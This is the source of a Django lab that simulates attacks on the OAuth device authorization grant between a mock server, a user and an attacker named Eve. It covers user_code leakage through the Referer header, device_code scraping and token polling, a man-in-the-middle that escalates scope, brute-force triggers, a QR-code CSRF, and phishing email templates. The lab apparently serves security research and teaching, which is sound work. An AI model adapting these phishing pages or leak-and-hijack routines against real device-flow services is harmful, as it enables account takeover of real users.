attacker/urls.py
from django.urls import path
from . import views

app_name = "attacker"

urlpatterns = [
    path('device', views.user_code_entry, name='device'),
    path('device/<int:user_code>', views.verification_complete, name='device'),
    path('process-user-code', views.process_user_code, name="process_user_code"),
    path('authenticate', views.authenticate_ua, name='authenticate'),
    path('get-client-id', views.get_client_id, name='get-client-id'),
    path('authorization-endpoint', views.authorization_endpoint,
         name='authorization-endpoint'),
    path('token-endpoint', views.token_endpoint, name='token-endpoint'),
    path('denial-of-service-attack', views.denial_of_service_attack, name='dos'),
    path('csrf-with-qr-code', views.csrfqr, name='csrfqr'),
    path('leak-user-code', views.leak_user_code, name='leak-user-code'),
    path('leak-device-code', views.leak_device_code, name='leak-device-code'),
    path('remote-phishing', views.remote_phishing, name='rp'),
    path('remote-phishing-indirect', views.remote_phishing_indirect, name='rp-indirect'),
    path('brute-force-user-code', views.brute_force_user_code,
         name='brute-force-user-code'),
    path('brute-force-device-code', views.brute_force_device_code,
         name='brute-force-device-code'),
    path('ad', views.referer, name='ad'),
]

device/urls.py
from django.urls import path
from . import views

app_name = "device"

urlpatterns = [
    path('', views.index, name='index'),
    path('grant', views.grant, name='grant'),
    path('grant-successful', views.grant_successful, name='grant-successful'),
]

device_grant_sec_simulation/urls.py
from django.contrib import admin
from django.urls import path
from django.urls.conf import include

from device_grant_sec_simulation import views as views

urlpatterns = [
    path('', views.startpage),
    path('admin/', admin.site.urls),
    path('attacker/', include('attacker.urls'), name='attacker'),
    path('configuration/', include('configuration.urls'), name='configuration'),
    path('device/', include('device.urls'), name='device'),
    path('authorization-server/', include('authorization_server.urls'),
         name='authorization_server'),
]

attacker/models.py
from django.db.utils import OperationalError
from django.db import models
from django.utils.timezone import utc
from datetime import datetime
import logging


logger = logging.getLogger(__name__)


def reset_attacker_db():
    """Resets attacker database and initiate utility object"""
    while True:
        try:
            DeviceGrant.objects.all().delete()
            User.objects.all().delete()
            ClientID.objects.all().delete()
            Utility.objects.all().delete()
            u = Utility()
            u.save(); break
        except OperationalError:
            pass


def utility_object():
    """Returns utility object"""
    while True:
        try:
            if Utility.objects.exists():
                return Utility.objects.first()
        except:
            pass


class User(models.Model):
    """Insecurely stores user and password for simulation purposes"""
    username = models.CharField(max_length=20)
    password = models.CharField(max_length=20)

    def __str__(self):
        return self.username


class DeviceGrant(models.Model):
    """Contains all relevant information for a device grant instance"""
    device_code = models.BigIntegerField()
    client_id = models.IntegerField()
    user_code = models.IntegerField()
    # lifetime of user_code in seconds
    user_code_lifetime = models.IntegerField(default=1800)
    verification_uri = models.CharField(max_length=50)
    verification_uri_complete = models.CharField(max_length=100)
    interval = models.IntegerField(default=5)  # interval in [s]
    scope = models.CharField(max_length=20, blank=True,
                             null=True)
    creation_timestamp = models.DateTimeField(auto_now=True)
    # indicate status of device grant, True if user authorized device
    authenticated = models.BooleanField(default=False)
    access_token = models.IntegerField(blank=True, null=True)
    access_token_creation_timestamp = models.DateTimeField(
        blank=True, null=True)
    # Determines how long access_token is valid for from creation date in seconds
    access_token_lifetime = models.IntegerField(default=604800)
    refresh_token = models.IntegerField(blank=True, null=True)
    user = models.ForeignKey(
        User, on_delete=models.CASCADE, blank=True, null=True)
    device_name = models.CharField(max_length=30, default="")

    def user_code_expires_in(self):
        """
        Calculate seconds to expiration of user_code and device_code

        returns -1 if invalid
        """
        dt = datetime.utcnow().replace(tzinfo=utc) - self.creation_timestamp
        if dt.total_seconds() < self.user_code_lifetime:
            return self.user_code_lifetime - dt.total_seconds()
        else:
            return -1

    def user_code_valid(self):
        """checks is user_code and device_code are still valid for device grant

        Returns:
            bool: True if valid
        """
        if self.user_code_expires_in() != -1:
            return True
        else:
            return False

    def access_token_expires_in(self):
        """
        Calculate seconds to expiration of access_token

        returns -1 if invalid
        """
        if self.access_token != None:
            dt = datetime.utcnow().replace(tzinfo=utc) - self.access_token_creation_timestamp
            if dt.total_seconds() < self.access_token_lifetime:
                return self.access_token_lifetime - dt.total_seconds()
        else:
            return -1


class ClientID(models.Model):
    """Used to ensure uniqueness of client_id before device grant is initiated"""
    client_id = models.IntegerField()
    device_name = models.CharField(max_length=30, default="")
    

class Utility(models.Model):
    """Used to access start time and determine whether the attack has terminated accross tasks"""
    # attack successful => other polling tasks can terminate, too
    terminated = models.BooleanField(default=False)
    # start time of polling => to synchronize timeout for tasks in brute force
    start_time = models.DateTimeField(blank=True, null=True)

attacker/views.py
from django.db.utils import OperationalError
from django.views.decorators.clickjacking import xframe_options_sameorigin
from django.http.response import HttpResponseForbidden, HttpResponseServerError
from django.shortcuts import render
from django.http import HttpResponse, JsonResponse, HttpResponseBadRequest
from django.urls.base import reverse
from django.utils.timezone import utc
from django.views.decorators.csrf import csrf_exempt
from django.utils.cache import patch_cache_control
from .tasks import initiate_N_device_flows, poll_for_grant_successful, brute_force_uc, brute_force_dc, polling
from .models import DeviceGrant as AttackerDeviceGrant, User, utility_object
from configuration.models import config_object
import os
from urllib.parse import urlencode
import json
from json import JSONDecodeError
import requests
from urllib.parse import urlencode, parse_qs
import pyqrcode
from datetime import datetime
import logging

logger = logging.getLogger(__name__)
headers = {'Content-type': 'application/x-www-form-urlencoded'}
attacker_device_name = "Charlie Ltd. Smart Refrigerator"


# The following views are for the User Code Leak scenario
@csrf_exempt
def leak_user_code(request):
    """Receives user_code in the User Code Leak scenario in spatial proximity.

    For simulation purposes the device directly leaks the user_code to the attacker.
    The attacker proceeds to register the device under his own account.

    Args:
        request (HttpRequest): HTTP request from client

    Returns:
        HttpResponse:
    """
    if request.method == 'POST':
        user_code = request.POST['user_code']
        logger.warning("Eve obtained user_code. Trying to connect the device to Eve's account...\
                       \n user_code: " + str(user_code))

        # try to connect device to the attacker's account
        login_data = dict(user_code=user_code, username="Eve", password="evil")
        login_request = requests.post(
            request.build_absolute_uri(reverse('authorization_server:authenticate')), 
            data=login_data)

        if not login_request.ok:
            logger.warning("Something went wrong. Eve was not able to connect.\
                           \n user_code: " + str(user_code))
        else:
            logger.warning("User Code Leak in spatial proximity was successful. \
                           Device is now connected to Eve's account!")
        return HttpResponse()
    else:
        return HttpResponseForbidden()


@xframe_options_sameorigin
def referer(request):
    """Returns advertisement and extracts user_code leaked via referer header.
    
    In referer header attack scenario, the attacker's advertisement is included on the login page
    in an iframe if the user calls verification_uri_complete. 
    The advertisement request is sent to this endpoint and the user_code is extracted using referer header.

    In the User Code Leak scenario, the attacker is authenticated at the AS. 
    In the Device Code Leak scenario, the attacker continues to retrieve the device_code \
        from the login page and starts polling to obtain an access_token with the user's account.
    """
    if request.method == 'GET':
        referer = request.META['HTTP_REFERER']
        user_code = referer.split('/')[-1]

        config = config_object()
        if config.attack_choice == "ucl":
            # User Code Leak not in Spatial Proximity
            logger.warning("User code obtained by means of referer header. \
                        Trying to connect the device to Eve's account...\n user_code: "
                        + str(user_code))
            login_data = dict(user_code=user_code, username="Eve", password="evil")
            login_request = requests.post(
                request.build_absolute_uri(reverse('authorization_server:authenticate')), 
                data=login_data)
            if not login_request.ok:
                logger.warning("Something went wrong. Eve was not able to connect.\
                                \n user_code: " + str(user_code))
            else:
                logger.warning("User Code Leak via referer header was successful. \
                                Device is now connected to Eve's account!")
        else:
            # Device Code Leak not in Spatial Proximity
            logger.warning("User code obtained by means of referer header. \
                        Trying to retrieve the device_code from login page...\n user_code: "
                        + str(user_code))
            login_page = requests.get(
                request.build_absolute_uri(reverse('authorization_server:device') 
                                           + "/" + user_code))
            # Extract device_code from login page
            try:
                device_code = int((str(login_page.content)).split("Device Code: ", 1)[1].split(" ", 1)[0])
                client_id_request = requests.post(
                    request.build_absolute_uri(reverse('authorization_server:find-client-id')), 
                    data=dict(device_code=device_code))
                client_id = int(client_id_request.json()['client_id'])

                logger.warning("Eve extracted a valid device_code. Start polling. \
                            \n device_code: " + str(device_code) + ", client_id: " + str(client_id))
                # set start time for timeout in polling
                utility = utility_object()
                utility.start_time = datetime.utcnow().replace(tzinfo=utc)
                while True:
                    try:
                        utility.save(); break
                    except OperationalError:
                        pass
                polling.delay(device_code, client_id,
                            request.build_absolute_uri('../..')[:-1])

            except (IndexError, ValueError, JSONDecodeError):
                logger.warning("Could not extract device_code from verification_uri_complete. \
                    Device Code Leak attack unsuccessful.")


        return render(request, 'attacker/ad.html')


@csrf_exempt
def brute_force_user_code(request):
    """Initiates brute force attack on user_code
    """
    brute_force_uc.delay(request.build_absolute_uri('../..')[:-1])
    return HttpResponse()


# The following views are for the Device Code Leak scenario
@csrf_exempt
def leak_device_code(request):
    """Receives device_code and client_id in the Device Code Leak scenario in spatial proximity.

    For simulation purposes the device directly leaks the data to the attacker.
    The attacker starts polling for an access_token.

    Args:
        request (HttpRequest): HTTP request from client

    Returns:
        HttpResponse:
    """
    if request.method == 'POST':
        try:
            device_code = request.POST['device_code']
            client_id = request.POST['client_id']
            logger.warning("Eve obtained device_code. Start polling. \
                           \n device_code: " + str(device_code))

            # set start time for timeout in polling
            utility = utility_object()
            utility.start_time = datetime.utcnow().replace(tzinfo=utc)
            while True:
                try:
                    utility.save(); break
                except OperationalError:
                    pass
            polling.delay(device_code, client_id,
                          request.build_absolute_uri('../..')[:-1])

        except:
            return HttpResponseBadRequest()

        return HttpResponse()
    else:
        return HttpResponseForbidden()


@csrf_exempt
def brute_force_device_code(request):
    """Initiates brute force attack on device_code
    """
    brute_force_dc.delay(request.build_absolute_uri('../..')[:-1])
    return HttpResponse()


# The following views are used in the Man in the Middle scenario
@csrf_exempt
def get_client_id(request):
    """MitM intercepts and forwards get_client_id request from device to AS 

    Args:
        request (HttpRequest): HTTP request from client

    Returns:
        HttpResponse: client_id response from AS
    """
    if request.method == 'POST':
        device_name = request.POST.get('device_name', '')

        # Get client_id for device from AS
        response = requests.post(
            request.build_absolute_uri('/authorization-server/get-client-id'),
            headers=headers, data={'device_name': device_name})
        # extract client_id
        client_id = parse_qs(response.text).get('client_id')[0]

        logger.warning("Attacker intercepted request of client_id from device to Alice-AS.\
            \n client_id: " + str(client_id))

        data = {'client_id': client_id}
        return HttpResponse(content_type='application/x-www-form-urlencoded',
                            content=urlencode(data))
    else:
        return HttpResponseForbidden()


@csrf_exempt
def authorization_endpoint(request):
    """MitM intercepts request to register device for device grant

    Provides client with device_code, user_code, verification_uri, verification_uri_complete, and interval needed for device grant.
    Attacker is greedy and sets scope to "FULL".

    Args:
        request (HttpRequest): HTTP request from client

    Returns:
        HttpResponse: Data needed for authorization or ResponseForbidden
    """
    if request.method == 'POST':
        client_id = request.POST['client_id']
        scope = request.POST.get('scope', '')

        # Register device for device grant
        if config_object().attack_choice == "mitm":
            scope = "FULL"
        # attacker changed scope to full scope
        data = {'client_id': client_id, 'scope': scope}
        response = requests.post(
            request.build_absolute_uri(
                '/authorization-server/authorization-endpoint'),
            headers=headers, data=urlencode(data))

        # Extract and store data from AS to device
        response_data = response.json()

attacker/templates/attacker/ad.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Ad</title>
    <style>
        .blink {
            color: red;
            font-size: xx-large;
            animation:blinking 1s linear infinite;
        }
        @keyframes blinking {
            50% { 
                opacity: 0;
            }
        }
    </style>
</head>
<body>
    <div style="text-align: center"><span class="blink">ADVERTISEMENT!!!</span></div>
</div>
</body>
</html>

attacker/templates/attacker/base.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Sign in</title>
    <link rel="stylesheet" type="text/css" href="{% static 'attacker/login.css' %}">
</head>
<body>
<div class="box">{% block authorization_form %}{% lorem %}{% endblock %}</div>
</div>
</body>
</html>

attacker/templates/attacker/login-user-code.html
{% extends "attacker/base.html" %}

{% block authorization_form %}
<h2>Connect Your Device</h2>
<p>Please enter the User Code displayed in your device</p>
<form method="post" autocomplete="off" action="{% url 'attacker:process_user_code' %}">
  {% csrf_token %}
  <input autocomplete="false" name="hidden" type="text" style="display:none;">
  <div class="inputBox">
    <input type="username" name="user_code" required onkeyup="this.setAttribute('value', this.value);" 
      autocomplete="off" value="">
    <label>Enter Code</label>
  </div>
  {% if error %}
  <p style="color: red;">{{error}}. Please try again.</p>
  {% endif %}
  <button type="submit" name="sign-in">Continue</button>
</form>
{% endblock %}

attacker/templates/attacker/login.html
{% extends "attacker/base.html" %}

{% block authorization_form %}
<h2>Sign in</h2>
<p>Use your AliceServices Account to connect your device with your account</p>
<form method="post" autocomplete="off" action="{% url 'attacker:authenticate' %}">
  {% csrf_token %}
  <input autocomplete="false" name="hidden" type="text" style="display:none;">
  <input type="hidden" name="user_code" value={{user_code}}>
  <div class="inputBox">
    <input type="username" name="username" required onkeyup="this.setAttribute('value', this.value);" 
      autocomplete="off" value="">
    <label>Username</label>
  </div>
  <div class="inputBox">
    <input type="password" name="password" required onkeyup="this.setAttribute('value', this.value);" 
      autocomplete="off" value="">
    <label>Password</label>
  </div>
  {% if error %}
  <p style="color: red;">{{error}}. Please try again.</p>
  {% endif %}
  <button type="submit" name="sign-in">Confirm</button>
</form>
{% endblock %}

attacker/templates/attacker/phishing-alert.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Phishing Alert</title>
    <style>
        body {
            margin: 1em;
            padding: 0;
            background-size: cover;
            font-family: sans-serif;
        }
        
        h2 {
            padding: 0;
            color: #fff;
            color: #202124;
            font-family: 'Google Sans','Noto Sans Myanmar UI',arial,sans-serif;
            font-size: 24px;
            font-weight: 400;
        }

        .box {
            width: 50rem;
            padding: 2.5rem;
            box-sizing: border-box;
            border: 1px solid #dadce0;
            -webkit-border-radius: 8px;
            border-radius: 8px;
        }

        .box p {
            font-size: 16px;
            font-weight: 400;
            letter-spacing: .1px;
            line-height: 1.5;
            margin-bottom: 25px;
        }

        .box h2 {
            margin: 0px 0 -0.125rem;
        }

        .box .inputBox {
            position: relative;
        }

        .box button {
            border: none;
            outline: none;
            color: #fff;
            background-color: #1a73e8;
            padding: 0.625rem 1.25rem;
            cursor: pointer;
            border-radius: 0.312rem;
            font-size: 1rem;
            
        }

        .box button:hover {
            background-color: #287ae6;
            box-shadow: 0 1px 1px 0 rgba(66,133,244,0.45), 0 1px 3px 1px rgba(66,133,244,0.3);
        }  

        .buttonbox {
            display: flex; justify-content: center;
        }

    </style>
</head>
<body>
<h1>Your Account May Have Been Compromised</h1>
<br>
<div class="box">
    <h2>Dear User,</h2>
    <p>We have noticed an unusual login attempt.</p>
    <p>To ensure the safety of your account, please click on the following button
        and login to your account. You will be asked to enter the user_code below.
    </p>
    <p>User Code: {{user_code}}</p>
    <button onclick="window.open('{{verification_uri}}','_blank')">OK</button>
    <br>
    <p>If you have trouble, please try the following link in order to skip entering a user code.</p>
    <button onclick="window.open('{{verification_uri_complete}}','_blank')">Skip</a>
    
</div>
</div>
</body>
</html>

attacker/templates/attacker/phishing-mail.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Phishing Email</title>
    <style>
        body {
            margin: 1em;
            padding: 0;
            background-size: cover;
            font-family: sans-serif;
        }
        
        h2 {
            padding: 0;
            color: #fff;
            color: #202124;
            font-family: 'Google Sans','Noto Sans Myanmar UI',arial,sans-serif;
            font-size: 24px;
            font-weight: 400;
        }

        .box {
            width: 50rem;
            padding: 2.5rem;
            box-sizing: border-box;
            border: 1px solid #dadce0;
            -webkit-border-radius: 8px;
            border-radius: 8px;
        }

        .box p {
            font-size: 16px;
            font-weight: 400;
            letter-spacing: .1px;
            line-height: 1.5;
            margin-bottom: 25px;
        }

        .box h2 {
            margin: 0px 0 -0.125rem;
        }

        .box .inputBox {
            position: relative;
        }

        .box button {
            border: none;
            outline: none;
            color: #fff;
            background-color: #1a73e8;
            padding: 0.625rem 1.25rem;
            cursor: pointer;
            border-radius: 0.312rem;
            font-size: 1rem;
            
        }

        .box button:hover {
            background-color: #287ae6;
            box-shadow: 0 1px 1px 0 rgba(66,133,244,0.45), 0 1px 3px 1px rgba(66,133,244,0.3);
        }  

        .buttonbox {
            display: flex; justify-content: center;
        }

    </style>
</head>
<body>
<h2>Your Account May Have Been Compromised</h2>
<br>
<p>from: <b>AliceServices</b> &#60;info@aliceservices.com&#62;</p>
<p>to:  <b>Bob</b> &#60;bob@bobmail.com&#62;</p>
<div class="box">
    <h2>Dear User,</h2>
    <p>We have noticed an unusual login attempt.</p>
    <p>To ensure the safety of your account, please click on the following button
        and login to your account. 
    </p>
    <div class="buttonbox">
        <button onclick="window.open('{{link}}','_blank')">OK</a>
    </div>
    
</div>
</div>
</body>
</html>

attacker/templates/attacker/qr-code.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF with QR-Code</title>
    <link rel="stylesheet" type="text/css" href="{% static 'attacker/login.css' %}">
</head>
<body>
<div class="box">
    <p>Please click on the QR-Code: </p>
    <a href="{{link}}" target="_blank">
        
        <img alt="Click Me" src="{% static 'attacker/qr_code.png' %}" style="display: block; margin: 0 auto"
        width="300" height="300">
    </a>
</div>
</body>
</html>

attacker/templates/attacker/success.html
{% extends "attacker/base.html" %}
{% block authorization_form %}
<h2>
    Authentication successful!
</h2>
{% endblock %}